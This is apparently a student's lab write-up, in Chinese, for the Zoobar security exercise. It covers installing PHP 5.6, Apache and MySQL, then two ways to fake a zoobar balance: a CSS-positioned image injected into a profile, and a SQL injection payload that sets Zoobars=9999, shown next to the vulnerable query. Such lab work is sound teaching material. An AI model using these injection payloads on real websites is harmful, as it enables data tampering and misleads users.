信息安全實踐Lab2-CSS
Ubuntu20.04 安裝 php5.6 ,php5.6-mysql,apache2,mysql5.7
安裝php5.6,php5.6-mysql,apache2
sudo apt-get install -y language-pack-en-base
sudo LC_ALL=en_US.UTF-8 add-apt-repository ppa:ondrej/php
sudo add-apt-repository ppa:ondrej/php
sudo apt-get update
sudo apt-get install php5.6
sudo apt-get install php5.6-mysql
sudo apt-get apache2
sudo a2dismod php7.4
sudo a2enmod php5.6
sudo service apache2 restart
安裝mysql5.7
問題1
問題2:Zoobar網站尋找漏洞
Manage your profile in the zoobar website, make your zoobars appear more than you really own. That is, after you modify your profile, when others or yourself look up your profile, they will see more zoobars than you actually own.
方法一:利用css
-
在a用戶的profile中輸入
<img src="http://106.13.136.87:8080/100.png" style="position:relative;top:-55px;right:-63px;width:34px;height:21px"/>
-
然後b用戶在User中輸入用戶名a,就會看到a有100個zoobars,其實a並沒有100個
方法二:sql注入
-
源碼中,處理$profile參數sql語句如下:
$sql = "UPDATE Person SET Profile='$profile' ". "WHERE PersonID=$user->id";
-
假設第一個用戶a在profile中輸入
',Zoobars=9999,Profile='Welcome to my profile!
-
最後執行的sql如下
update Person set Profile='',Zoobars=9999,Profile='Welcome to my profile!' where PeronID=1;
-
最後再去查a的餘額就有9999個zoobars